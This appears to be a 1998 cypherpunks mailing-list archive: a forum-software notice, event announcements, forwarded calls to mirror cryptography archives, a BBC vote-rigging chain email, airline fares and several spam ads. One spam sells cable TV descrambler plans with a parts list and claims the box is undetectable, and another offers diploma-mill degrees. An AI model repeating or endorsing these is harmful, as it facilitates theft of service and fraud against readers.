That's how Deja News tells you which posts are new since you last
visited. Once you open and read a message, the bolding goes away.
You have the option to Mark Thread As Read, and an entire set of
messages will lose their  boldness.  In addition, you can Mark All
As Read, and every message in that  forum will become un-bold.

** When you leave a forum and come back later, messages that you
read previously are not displayed. **
You can see these already-read messages by clicking the Show All
button.

Here's the tricky part: If you read all the messages in a thread
and then someone  adds another, the entire thread will be displayed
and most messages will not be  bold. Just the new message that you
have not yet read will appear with bolded text. (In our current
message board software, messages that you had already  read remain
hidden when a new message is added.)

** On Tuesday, some messages that you have read will be marked as
unread. **
We will migrate all the messages currently in Podium over to the
new Deja News software. However, we cannot keep track of which
messages every user has read. As a result, all messages will be
marked initially as unread. You can easily take care of this by
doing one of two things:

1) Use the Mark All As Read  found at the top of the new message
board. This approach is fastest, but it might make you overlook
some messages you really do want to read.

2) Use the Mark Thread As Read text link found at the beginning
of each thread. This approach is a more selective way to get
up-to-date, but it takes a bit more time.

** You can Expand or Collapse the entire thread list. **
The thread list shows all the individual "conversations" happening
in the  message board. The default setting shows you just the
starting topic in each  thread.  If you want to see a detailed
list of all the replies to that initial  message,  just click the
Expand button. To shrink your threads list again, click the
Collapse  button. Collapse and Expand are basically toggle buttons.
Show All and Show  Unread are also toggle buttons, and they oper-
ated  independently of the Collapse and Expand controls.

** Your browser's reload button works in the forums. **
In Podium, when you hit reload in your browser, your forum display
settings would disappear.  In the upcoming Deja News software, your
settings are preserved. So go ahead and hit reload to see if new
messages have been added while you are online -- it works!

** Give Search a try. **
The Deja News fast search capability will help you track down
messages easily.  You can look across all the forums or in just one,
for any text in a message. If  you choose Mark All As Read but want
to locate an earlier message, use the Search function.

Thanks for taking the time to read this note. I hope these tips
give you some insight into the new software and make the switch
smoother. We're adding user-suggested info to our help file with
the launch of the new forums next week, so keep those comments
and ideas coming!

We look forward to seeing you in the new forums, and we are glad
to have you as a part of the ZD Community.


Wendy Frankwich
ZD Community Central
http://chkpt.zdnet.com/chkpt/zdn11204/www.zdnet.com
http://chkpt.zdnet.com/chkpt/zdn11204/www.zdtv.com

_______________________________________________________________________
To be removed from this list, simply reply to this message with
"unsubscribe" as your subject.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: promo124@hotmail.com
Date: Sun, 6 Dec 1998 01:19:58 -0800 (PST)
To: promo127@hotmail.com
Subject: Frequent Asked Questions Re: $9.99 to build your own
Message-ID: <199812060919.BAA06673@toad.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 3754
Lines: 96




              (FAQ) Frequent Asked Questions --CABLE TV DESCRAMBLER
(do not hit the reply button, this message is generated automatically for
 those interested in the product. You'll receive this message only once)

 Hello!!!   =)

 "Thank you for requesting more information about the Cable Television 
 Descrambler.
 I've been asked so many good questions that I left unanswered in my
 first letter.  For that reason, I have put together this Question & Answer letter. 
 I apologize in advance for not being able to answer each of your  
 questions personally.  The response has been overwhelming. "
 
 Q: Will the descrambler on Fiber, TCI, Jarrod and satellite systems? 
 A: The answer is YES.  In respect to satellite, you just get MORE stuff!  
 
 Q: Do I need a converter box? 
 A: This plan works with or without a converter box.  Specific instructions 
 are included in my plans for each! 
 
 Q: Where can I find the 75pf-100pf variable capacitor, Radio Shack doesn't
 have it?   
 A: Many Radio Shacks do have it.  However, you have two other  
 options.  1st call a radio speciality supply store in your area that  
 is listed in the yellow pages.  2nd you can order the capacitor from me. 
 If needed I will mail you as many as you need for the price (s) below. I'm not trying to make a profit out of it, just want to help you. I'll wrap it carefully and send it to you only if you send me a self addressed #10 size padded envelope,  with 64c postage affixed.	

1-10 	      75pf - 100pf variable capacitor      	$12.99 ea.		
20-Up 		.....................................      $ 10 ea.
 
 Q: Can the cable company detect that I have the box? 
 A: No, the signal descrambles right at the box and does not move back  
 through the line.
 
 Q: Do I have to alter my existing cable system, television or VCR? 
 A: The answer is no. 
 
 Q: Does this work with my remote control? 
 A: The answer is no.  It's a manual kind of thing... but very easy.   
 Have your spouse or significant other get off the couch to do the deed! 
 
 Q: Can you email me the plans? 
 A: No, the plans come with an easy to follow picture guide. 
 
 Q: Does this work everywhere across the country? 
 A: I have friends in four states and one in England and Brasil that use the same  
 parts and the same plans and they are all successful. 
 
 Q: Is this deal guaranteed? 
 A: Yes, if you are unhappy for any reason I will refund your money. 
 
 Q: Is this a rip off or a scam? 
 A: No, if it were I'd charge $50.00 or more for the plans.  Be sure I not  
 going to damn myself to hell by ripping you off for a measly $9.99 or  
 so.
 
  Q: When I order, when will I get my stuff? 
 A: I mail out all orders within 24 hours of receiving it... IF YOU SUPPLY  
 A SELF ADDRESSED, STAMPED RETURN ENVELOPE WITH 55 CENTS POSTAGE AFFIXED. 
 
 Q: Again, How much does it cost to get the instructions plans and the easy to follow diagrams? 
 A:To order a set of the instructions send $9.99 by cash, check or money  
 order payable to: RMS Enterprises  Send to:  50 Lexington Ave, Suite 209 /  New York City, NY  10010.
  
 Q: Can you give me a list of the parts again? 
 A: Yes.
  1 - Radio Shack mini box (part #270-235) 
 1 - 1/4 watt resistor 2.2K - 2.4K ohm (part #271-1325) 
 1- 75pf-100pf variable capacitor (special order) 
 2 - F61a chassis-type connectors (part #278-212) 
 12" no. 12 solid copper wire 
 12" RG59 coaxial cable
 
 Q: I lost your address, could you give it to me again. 
 A: 50 Lexington Ave, Suite 209 /  New York City, NY  10010 USA 
 
 Q: How can I pay for this? 
 A: Check, Money Order or Cash.  Sorry, no credit cards accepted.
 
 
 I look forward to your order.

Raul Mendez Enterprises   (RMS Enterprises)
  
 Kindest Personal Regards,
 
 
     Raul Mendez






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BannerExplode@usa.net
Date: Sun, 6 Dec 1998 05:07:24 -0800 (PST)
To: FreebieLover@hotmail.com
Subject: Freebie, Freebie - How to get heavy traffic to your web site!
Message-ID: <199812061317.FAA21334@baynet.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1467
Lines: 51



                      ***********************

Greetings freebie lovers,

We all know that to make money with a web site you need lots of
traffic! This takes mass advertising or top status on many search
engines. 

We have found a better way that will get your banner on over
50,000 other web sites permanently, for life! When Net Surfers click
on your banner they will see your site pop up on their browser!
This method, of "HyperLinked Banners" is the most powerful method of
getting heavy traffic, to any web site, ever developed.

The "Banner Explode System" can be installed on your web site
in an hour. Then it spreads to other web sites and keeps re-
generating forever. Your hyperlinked banner will be on 1,000's and
1,000's of web sites around the world!  It is very prolific.

  NOTHING WORKS BETTER FOR GETTING TRAFFIC TO YOUR WEB SITE!

To get access to the "Banner Explode System", just fill out the
order form below and Snail Mail by U.S.P.S...... You will get
everything you need in just a few days! ABSOLUTELY FREE !!!

We are sure you will be delighted with our "Banner Explode
System!"  

     ------------ PRINT ------- CUT ----------------

******* NEATLY FILL IN THE FOLLOWING INFORMATION *******

Name:
Address:
City/St/Zip:
Phone:
Email address:

Mail this order form with a self addressed, stamped, #10 business
envelope to:

Banner Explode System
P.O. Box 66781
Phoenix, AZ 85082

     ====== SATISFACTION GUARANTEED - It's FREE ====== 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: times@caxton.newsint.co.uk
Date: Sun, 6 Dec 1998 11:57:43 -0800 (PST)
Subject: No Subject
Message-ID: <199812061957.TAA25102@caxton.newsint.co.uk>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1625
Lines: 46


Dear Reader,
  
We are happy to provide feedback about The Times/Sunday Times
website, in the first of an occasional series of news briefs . . . 
          
Investment boosts access speed
  
The site is determined to make continual improvements for its
readers.  Significant extra cash is being channelled into making it the
fastest, easiest navigated and most innovative publishing site on the web.
  
Recent months have brought enormous increases in traffic, and you
may have noticed the odd download or access delay. We are concerned about
this just as you are, so have increased our bandwidth significantly. We
already have much better access speeds.
  
But our investment doesn't stop there: we will soon add increased
server capacity, so we can provide a range of exciting new features in the
next few months.
  
Thank you for your continued commitment to The Times & The Sunday
Times site. We welcome all comments or suggestions to
webmaster@the-times.co.uk  
  
The Times & The Sunday Times site launches "News First"
  
The UK's first extensive consumer newspaper-based rolling news and
preview service went live on November 26.
  
The free service includes headline news tickers on the registration
and home pages and bulletins on the 10 main breaking stories from 7am-10pm
GMT, followed by previews of news and features from the following day's
offline edition. News headlines are backed both by paragraph-sized
bulletins and links to relevant stories on the day's newspaper site.
  
Best wishes,
  
  
Mike Murphy
Managing Editor
News International Internet Publishing
(The Times and The Sunday Times online)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: urbr4kan@rto.dec.com
Date: Sun, 6 Dec 1998 23:34:32 -0800 (PST)
To: guy@earthlink.net
Subject: info requested
Message-ID: <199812070734.IAA26004@ns.de.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 467
Lines: 24



UNIVERSITY DEGREE PROGRAMS

Increase your personal prestige and money 
earning power through an advanced 
university degree. 

Eminent, non-accredited universities will 
award you a degree for only $200. 

Degree granted based on your present 
knowledge and experience.  No further 
effort necessary on your part.

Just a short phone call is all that is required for a 
BA, MA, MBA, or PhD diploma in the field of your 
choice. 

For details, call 602-230-4252





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 7 Dec 1998 11:18:39 -0800 (PST)
To: Recipient List Suppressed:;
Subject: DCSB: Ira Heffan and Mike Schmelzer; "Software Patents" and Digital Commerce
Message-ID: <v04020a29b291d26fcb9d@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 6083
Lines: 153



--- begin forwarded text


Mime-Version: 1.0
X-Sender: rah@pop.sneaker.net
Date: Mon, 7 Dec 1998 13:02:59 -0500
To: dcsb@ai.mit.edu, dcsb-announce@ai.mit.edu
From: Robert Hettinga <rah@shipwright.com>
Subject: DCSB: Ira Heffan and Mike Schmelzer; "Software Patents" and
 Digital Commerce
Cc: Ira Heffan <heffan@tht.com>, Mike Schmelzer <schmelze@tht.com>,
        Roland Mueller <roland@secunet.com>,
        "Jonathan J. Rusch" <rusch1@erols.com>
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Robert Hettinga <rah@shipwright.com>

-----BEGIN PGP SIGNED MESSAGE-----


          The Digital Commerce Society of Boston

                       Presents

              Ira Heffan and Mike Schmelzer
             Testa, Hurwitz & Thibeault, LLP

         "Software Patents" and Digital Commerce



                Tuesday, January 5th, 1999
                       12 - 2 PM
             The Downtown Harvard Club of Boston
               One Federal Street, Boston, MA



Although the very idea of patenting software seems to be an anathema to much
of the programming community, patents on software continue to stream out of
the U.S. Patent Office.  Everyone involved in digital commerce applications,
which are by definition software-based, probably has heard about recent
events:  The Court of Appeals for the Federal Circuit decided "State Street
Bank & Trust Co. v. Signature Financial Group," which explicitly ratified
patenting methods of doing business, and a spate of well-publicized patents
have issued claiming to cover such concepts as the virtual shopping cart and
the reverse auction.  As a prerequisite to discussing these recent
developments, the first part of our talk will provide an introduction to
patents.  We will explain what patents are and what they are not, and
describe the business goals that a patent can serve.  Then we will talk
about current events, and attempt to  put the _State Street_ case in
context.  We will present a survey of recently-issued patents (suggestions
welcome) related to digital commerce, and conclude with some speculation
about current trends, including a novel form of software patent with
potentially huge implications.

Ira Heffan (heffan@tht.com) and Mike Schmelzer (schmelze@tht.com) are patent
attorneys at Testa, Hurwitz & Thibeault, LLP (http://www.tht.com).  We will
be presenting our own personal views on this topic, and not the views of
Testa, Hurwitz & Thibeault, LLP or its clients.


This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, January 5, 1999, from 12pm - 2pm at the Downtown Branch of
the Harvard Club of Boston, on One Federal Street. The price for lunch
is $32.50. This price includes lunch, room rental, various A/V hardware,
and the speakers' lunch.  The Harvard Club *does* have dress code:
jackets and ties for men (and no sneakers or jeans), and "appropriate
business attire" (whatever that means), for women.  Fair warning: since
we purchase these luncheons in advance, we will be unable to refund the
price of your lunch if the Club finds you in violation of the dress
code.


We need to receive a company check, or money order, (or, if we
*really* know you, a personal check) payable to "The Harvard Club of
Boston", by Saturday, January 2nd, or you won't be on the list for
lunch.  Checks payable to anyone else but The Harvard Club of Boston
will have to be sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The
Harvard Club of Boston", in the amount of $32.50. Please include your
e-mail address, so that we can send you a confirmation

If anyone has questions, or has a problem with these arrangements
(We've had to work with glacial A/P departments more than once, for
instance), please let us know via e-mail, and we'll see if we can work
something out.


Upcoming speakers for DCSB are:

February   Roland Mueller   European Privacy Directive
March      Jonathan Rusch   Internet Fraud

We are actively searching for future speakers.  If you are in Boston
on the first Tuesday of the month, and you would like to make a
presentation to the Society, please send e-mail to the DCSB Program
Commmittee, care of Robert Hettinga, <mailto: rah@shipwright.com>.


For more information about the Digital Commerce Society of Boston,
send "info dcsb" in the body of a message to <mailto:
majordomo@ai.mit.edu> . If you want to subscribe to the DCSB e-mail
list, send "subscribe dcsb" in the body of a message to <mailto:
majordomo@ai.mit.edu> .

We look forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNmwX/8UCGwxmWcHhAQFfjgf+IBe01g9XCldZYT+GRDI5ho1sOPgL6W7q
zLDQToz0GGM/NZzv44SMTSGpDFx80R1yautvy4xHMnYQy2UnvO2WGsfrjuwSdQte
8qxoRAFkihyP/mi/83As2TwWdp6QhwbjI02hyP6elsdSzsspflwwonOB4I+8E/xX
UDsGdQH4AHaWrK1S5XYfJSHSRGOBpk2+cqboiGvbcbC1z0vDRGrnztf8GADoPVC3
6vw4M00f+cgIuoaqqO4ol62Os6D+WPVw2NMop20OD62EGzYO2pyQjboPvBLxyRD7
smLz/4S598uLZF0GX+GO/8rCjAORask/Qt3SFIU2HMMPj9nKIvVtJw==
=gz6w
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'

For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: feedback@telescan.com
Date: Mon, 7 Dec 1998 21:28:03 -0800 (PST)
To: CYPHERPUNKS@toad.com
Subject: Alpha Options Newsletter
Message-ID: <199812080528.VAA21163@toad.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 2304
Lines: 21


Dear Fellow Investor,

If you're a trader/investor and like quick, large profits, you'll want to take a look at the Alpha Options Newsletter, available from Telescan through the TIP software or on Telescan's investor's supersite, Wall Street City (www.wallstreetcity.com).  Fast on the heels of 1997's gross profit of 322%, the newsletter portfolio has returned 179% as of Nov. 13!  Even more amazing is that return has been realized while holding an average of 80% cash!*  The newsletter, which has been published since April 1995, has evolved into an informative weekly report that uses key basic elements of technical analysis to generate quick profits, while adhering to a stringent money management system that cuts losses and rides gains.

The authors scan several hundred charts a week to identify the stocks that look ripe for short-term gains.  The newsletter pinpoints price targets and profit objectives for each recommendation and sets stops on open positions.  Once a position is entered, it's closely monitored and adjustments to targets or objectives are initiated if necessary.

The newsletter has had fabulous success over the past two years as money management guidelines have been set (and more importantly) followed to optimize the portfolio returns.  The newsletter offers a candid and unbiased opinion on stocks and recommends both calls and puts as justified by the market.  The AON portfolio typically holds between 5-15 open positions, with average being about 8 open positions.  The authors analyze each recommendation in detail and give specific targets for when to take profits.

The newsletter is published 48 times a year on Sunday evenings.  You can subscribe to this informative, educational newsletter online for just $30/month.  Call 1-800-324-4692 to subscribe.

So go ahead and give the newsletter a try and see how you too can generate substantial profits from trading options.

*The ideal starting portfolio size is $20,000, although a starting portfolio of $5,000 is sufficient. 

Disclaimer: Trading involves risk, including possible loss of principle and other losses. Your trading results may vary. No representations are being made that these techniques will result in or guarantee profits in trading. Past performance is no indication of future results.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 7 Dec 1998 19:06:30 -0800 (PST)
To: Recipient List Suppressed:;
Subject: FWD: Read this. Now. And *act* on it. (was re: Building cryptoarchives worldwide to foil US-built Berlin Walls)
Message-ID: <v04020a3db29241f3c361@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 3495
Lines: 82


It's time, folks.

They can't win if we do anything at all, but they *will* win if we do nothing.

Robert Hettinga

--- begin forwarded text


X-Authentication-Warning: toad.com: Host localhost [127.0.0.1] didn't use
HELO protocol
To: cryptography@c2.net, gnu@toad.com
Subject: Building crypto archives worldwide to foil US-built Berlin Walls
Date: Mon, 07 Dec 1998 15:23:54 -0800
From: John Gilmore <gnu@toad.com>
Sender: owner-cryptography@c2.net

The US Wassenaar initiative is an attempt to deny the public not only
all future strong crypto developments, but all existing ones.  As
today's message from Denmark makes clear, the freedom-hating
bureaucrats are threatening to prosecute a citizen merely for
publishing PGP on his web page.

Let's at least ensure that they don't eliminate *today's* strong
crypto, by replicating crypto archives behind each Berlin Wall they
threaten to erect.  Today we depend on a small number of archives (in
a small number of countries) containing source and binaries for PGP,
SSH, Kerberos, cryptoMozilla, IPSEC, and many other useful crypto
tools that we use daily.

Let's replicate these archives in many countries.  I call for
volunteers in each country, at each university or crypto-aware
organization, to download crypto tools while they can still be
exported from where they are, and then to offer them for export from
your own site and your own country as long as it's legal.  (The
Wassenaar agreement is not a law; each country has merely agreed to
try to change its own laws, but that process has not yet started.)

And if at some future moment your own government makes it illegal for
you to publish these tools, after all your appeals are denied, all the
pro-bono court cases rejected, and all the newspaper coverage you can
get has been printed, then restrict your web site so that only your
own citizens can get the tools.  That'll still be better than the
citizens of your country having NO access to the tools of privacy!

(I suggest putting these tools on a Web site on a machine that you
own, rather than on a web site where you buy space from someone else.
That way there'll be nobody for the freedom-squashers to threaten
except you.)

I'm sure that John Young's excellent http://jya.com site will be happy
to provide an index of crypto archives around the world, if people
will send him notices at jya@pipeline.com as your sites come up.
(Each archive should locally mirror this list, so that we won't depend
on a single site.)

Rather than having their desired effect of squelching crypto
distribution, perhaps their overbold move can inspire us to increase
strong crypto distribution tenfold, by making it clear to the public
that if you don't keep a copy on your own hard drive, the governments
of the world will be merciless in scheming to deny you access to it.
And if crypto developers have to publish on books, or rely on
smugglers to get crypto from country to country, then at least each
country will have its distribution arrangements already ready for when
the book is scanned or the smuggler arrives.

	John Gilmore

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Dec 1998 06:48:55 -0800 (PST)
To: Recipient List Suppressed:;
Subject: Re: Building crypto archives worldwide to foil US-built Berlin  Walls (fwd)
Message-ID: <v04020a02b292ebe4fd12@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1390
Lines: 50


Last spam on this subject. The rest is up to you.

Cheers,
Robert Hettinga

--- begin forwarded text


X-Sender: jya@pop.pipeline.com
Date: Tue, 08 Dec 1998 09:09:04 -0500
To: cypherpunks@EINSTEIN.ssz.com
From: John Young <jya@pipeline.com>
Subject: Re: Building crypto archives worldwide to foil US-built Berlin
  Walls (fwd)
Mime-Version: 1.0
X-Mailing-List: cypherpunks@ssz.com
X-Loop: ssz.com
X-Language: English, Russian, German
Sender: owner-cypherpunks@cyberpass.net
Precedence: first-class
Reply-To: John Young <jya@pipeline.com>
X-Loop: cypherpunks@cyberpass.net

In response to John Gilmore's call for a foil to US-Wassenaar
restrictions acoming, we've put up a preliminary list of international
cryptography sources for mirroring:

   http://jya.com/crypto-free.htm

This is a quick starter-kit and is far from comprehensive.
Contributions welcome.

Ken Williams offers an impressive (177MB) crypto/stego archive:

  http://www.genocide2600.com/~tattooman/cryptography/

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Bragg@ssa.co.uk
Date: Tue, 8 Dec 1998 02:31:13 -0800 (PST)
To: phillip_wilder@ryder.com
Subject: Votes
Message-ID: <802566D4.0039658A.06@seunt002e.ssa.co.uk>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1860
Lines: 67


I wonder how the good 'ol Beeb will handle loads of votes from non-uk
people.  Especially how will they cope with anonymous remailers.

I know this is off-topic cypherpunks but lets indulge in a little gentle
humour.

---------------------- Forwarded by Richard Bragg/UK/SSA_EUROPE on 08/12/98
10:27 ---------------------------


Hilary Davidson
08/12/98 10:24

To:   UK BEC, UK Contractors BEC, Workfun
cc:
Subject:  Votes

This has to be done!!
---------------------- Forwarded by Hilary Davidson/UK/SSA_EUROPE on
08-12-98 10:23 AM ---------------------------


"Ashley Lane" <adlane@fizzbang.demon.co.uk> on 07-12-98 10:00:39 PM

To:   "Andy Randerson" <andy@andyran.demon.co.uk>, "Marcus Lane"
      <marcus.lane@Drives.Eurotherm.com>, Hilary Davidson/UK/SSA_EUROPE,
      "Jonathan Cory" <jonathan_cory@phoenix.com>, "Jason Boxall"
      <JBoxall@lonza.co.uk>
cc:
Subject:  Votes




All,
We are going to try to influence the result of the voting for BBC
Sports Personality of the year. It has been decided that David Beckham
would provide most embarrassment to the organisers if winning, so
could you all e-mail your vote to the following address:

sports.review@bbc.co.uk

More importantly, can you forward this mail to all your mates &
acquaintances asap in the hope that they will participate. Your
co-operation in this matter is greatly appreciated






                     ________________________________


The information contained in this electronic mail message is confidential.
It is intended solely for the use of the individual or entity to whom it is
addressed and others authorised to receive it.  If the reader of this
message is not the intended recipient, you are hereby notified that any
use, copying, dissemination or disclosure of this information is strictly
prohibited.
                     ________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: a14u@a14u.com
Date: Wed, 9 Dec 1998 07:30:31 -0800 (PST)
To: advertiser@pw-market.com
Subject: Attention: All Sportsmen!!!!!!!!!!
Message-ID: <bulk.290.19981208221051@allegra.pw-market.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 526
Lines: 30








Sportsmen, are you into:

Hunting, Fishing, Camping, Hiking, Biking, 
Climbing, Sports, Playing or just Work?
Then you'll want to click here!
Because you'll love what you see!

http://www.a14u.com



_______________________________________________________________________________

If you would like to be removed from our mailing list,
simply reply with "Remove" in the subject heading.
You will be deleted from any further mailing.

_______________________________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trans World Specials" <twaweb@inet2.twa.com>
Date: Wed, 9 Dec 1998 00:34:26 -0800 (PST)
To: Trans World Airlines Customers <twaweb@inet2.twa.com>
Subject: Trans World Specials Fare Sales
Message-ID: <19981208163901.24793.qmail@inet2.twa.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 10464
Lines: 322


Welcome to Trans World Specials for
 December 8th, 1998.  All tickets must
 be purchased at time of booking and not
 later than December 11, 1998. 
 
 Did you know you still have until December
 15th to travel and earn double Aviator 
 miles.  Don't miss your chance to double
 your earnings.  And your chance to earn
 up to 15,000 bonus Aviator miles has 
 been extended to January 31, 1999. 
 You can get the details at:
 http://www.twa.com/frq_trav_info/ft_aviators_bonus.html
 
 Beginning next week we will launch a great new
 enhancement to our Hot Fares. Rather than 
 phoning in your reservation, you will book 
 them directly on our website.  This will make
 it even easier for you save big. 
 
 With select fares of $89 and higher you
 can receive a discount by redeeming 
 only 5000 Aviator miles. 
 
 To celerate our return to Mexico City, TWA is
 offering a great fare from St. Louis to Mexico City.
 Book your ticket with TWA by 12/13/98. You can 
 stay as few as 3 days or as many as 30. Originate
 travel betweeen 1/31/99 and 2/28/99 and complete
 travel by 3/31/99.  Say yes to Mexico!
 
 We also have a great deal from New York to 
 St. Maarten, Netherlands to kick off our 
 new service. Depart New York on December 17-18
 and return December 19-21, 24, 25. 
 
 
 On to this week's Trans World Specials.
 
 ************INTERNATIONAL*************
 
 
 *****MEXICO CITY, MEXICO***********
 
 Roundtrip fare to MEXICO CITY, MEXICO from:
 (Depart January 31-February 28 and 
 return by March 31)
 
 City:		Fare:
 
 St. Louis	$198
 
 
 Roundtrip fare to ST. MAARTEN, NETHERLANDS from:
 (Depart December 17-18 and 
 return December 19-21, 24, 25)
 
 City:		Fare:
 
 New York, NY	$248
 
 ***********DOMESTIC*****************
 
 Roundtrip travel between ST. LOUIS, MO and:
 (Depart Friday 12/11 after 7 pm or all day 12/12
 and return Monday or Tuesday 12/14 or 12/15)
 
 Fare:	City:			5000 Miles Plus:
 
 $149	Denver, CO		$99
 $89	Milwaukee, WI		$39
 $159	New York, NY (LGA)	$109
 $149	Tampa, FL		$99
 $149	Washington, DC (DCA)	$99
 
 
 Roundtrip fares between ST. LOUIS, MO and:
 (Depart Saturday 12/12 and return Monday
 or Tuesday 12/14 or 12 15)
 
 Fare:	City:			5000 Miles Plus:
 
 $129	Austin, TX		$79
 $139	Hartford, CT		$89		
 $149	Ft. Lauderdale, FL	$99	
 $169	Sacramento, CA		$119
 $159	Salt Lake City, UT	$109
 $129	San Antonio, TX		$79
 $99	Shreveport, LA		$49
 
 
 Roundtrip fare between NEW YORK, NY (JFK) and:
 (Depart Saturday 12/12 and return
 Monday or Tuesday 12/14 or 12/15)
 
 Fare:	City:			5000 Miles Plus:
 
 $139	Orlando, FL		$89
 
 
 Roundtrip fare between AUSTIN, TX and:
 (Depart Saturday 12/12 and return 
 Monday or Tuesday 12/14 or 12/15)
 
 Fare:	City:			5000 Miles Plus:
 
 $219	Hartford, CT		$169
 $159	Milwaukee, WI		$109
 $219	New York, NY (LGA)	$169
 $199	Washington, DC (DCA)	$149
 
 
 Roundtrip fare between SAN ANTONIO, TX and:
 (Depart Saturday 12/12 and return 
 Monday or Tuesday 12/14 or 12/15)
 
 Fare:	City:			5000 Miles Plus:
 
 $219	Hartford, CT		$169
 $159	Milwaukee, WI		$109
 $219	New York, NY (LGA)	$169
 $199	Washington, DC (DCA)	$149
 
 
 Roundtrip fare between HARTFORD, CT and:
 (Depart Saturday 12/12 and return
 Monday or Tuesday 12/14 or 12/15)
 
 Fare: 	City:			5000 Miles Plus:
 
 $269	Sacramento, CA		$219
 $239	Salt Lake City, UT	$189
 $179	Shreveport, LA		$129
 
 
 Roundtrip fare between FT. LAUDERDALE, FL and:
 (Depart Saturday 12/12 and return 
 Monday or Tuesday 12/14 or 12/15)
 
 Fare:	City:			5000 Miles Plus:
 
 $179	Milwaukee, WI		$129
 $269	Sacramento, CA		$219
 
 
 Roundtrip fare between SACRAMENTO, CA and:
 (Depart Saturday 12/12 and return 
 Monday or Tuesday 12/14 or 12/15)
 
 Fare:	City:			5000 Miles Plus:
 
 $219	Milwaukee, WI		$169
 $269	New York, NY (LGA)	$219
 $269	Washington, DC (DCA)	$219
 
 
 Roundtrip fare between SHREVEPORT, LA and:
 (Depart Saturday 12/12 and return 
 Monday or Tuesday 12/14 or 12/15)
 
 Fare:	City:			5000 Miles Plus:
 
 $159	Denver, CO		$109
 $149	Milwaukee, WI		$99
 $179	New York, NY (LGA)	$129
 $219	Sacramento, CA		$169
 $179	Salt Lake City, UT	$129
 $159	Washington, DC (DCA)	$109
 
 
 Roundtrip fare between SALT LAKE CITY and:
 (Depart Saturday 12/12 and return 
 Monday or Tuesday 12/14 or 12/15)
 
 Fare:	City:			5000 Miles Plus:
 
 $179	Milwaukee, WI		$129	
 $239	Washington, DC (DCA)	$189
 
 
 For reservations call TWA at 1-800-221-2000 and ask
 for TWA's special Internet fares. To redeem Aviator 
 Miles with your fare, call the Aviators Service Center
 at 1-800-325-4815. 
 
 
 ****************ALAMO****************
 
 Alamo offers the following low rates 
 valid 12/11/98 - 12/14/98
 
 $16.49	Austin, TX - San Antonio,TX
 
 $17.49	Milwaukee, WI - St. Louis, MO
 
 $18.49	Salt Lake City, UT
 
 $19.49	Ft. Lauderdale, FL - Orlando, FL - Tampa, FL
 
 $20.49	Hartford, CT - Washington, DC(National) -Sacramento, CA
 
 $21.49	Denver, CO
 
 For reservations call Alamo at 1-800-GO-ALAMO and
 request rate code RT and ID # 443833. For online 
 reservations visit the Alamo website at:
 http://www.goalaomo.com
 
 ***********HILTON HOTELS/RESORTS******************
 
 $72	Hilton Crystal City at National Airport
 	Arlington, VA ( Free airport shuttle, 
 	located 5 minutes form the sights of D.C.)
 
 $79	Hilton Deerfield Beach/Boca Raton
 	Deerfield Beach, FL (Just 2 miles from the 
 	beach. Visit Town Center Mall & 
 	Boca Museum of Art)
 
 $59	Hilton Salt Lake City Airport 
 	Salt Lake City, UT (Located next to a lake,
 	stunning view of Wasatch Mountains)
 
 $89	Hilton St. Louis Frontenac-St. Louis, MO
 	(Free airport shuttle and parking, located
